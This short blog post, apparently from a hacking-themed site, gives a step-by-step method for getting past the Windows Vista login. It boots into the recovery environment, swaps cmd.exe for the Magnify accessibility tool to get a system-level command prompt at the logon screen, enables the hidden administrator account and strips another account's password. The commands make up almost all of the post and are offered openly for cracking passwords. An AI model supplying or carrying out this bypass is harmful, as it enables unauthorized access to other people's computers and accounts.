Counter Hack Quote Of The Day

"Worrying is like sitting in a rocking chair, you can rock all you want, but it doesn't get you anywhere."
- Landon Massel

Crack Password in Windows Vista  

Posted by Hitesh

Try to boot from windows vista dvd or if u have oem computer go to repair options !!

Boot to Win RE
Click Command Prompt option.
Type the following command:
CD Windows\system32
ren cmd.exe cmd.old
ren magnify.exe cmd.exe
ren cmd.old magnify.exe
Restart computer
Click on Easy of Access centre left side bottom à Choose Magnify option à Command prompt opens up
Type: net user administrator /active:yes
Restart the computer
Logon on administrator account and then using User Account page, remove password for the other account
Search for Magnify.exe in start search and click on it
Command prompt opens up
Type: net user administrator /active:no
Restart the computer
This will disable the administrator account.
Boot to winRE
Type the following:
CD Windows\system32
ren magnify.exe cmd.old
ren cmd.exe magnify.exe
ren cmd.old cmd.exe
Restart the computer – system logs on to the User account without asking for password provided there is only one user account.



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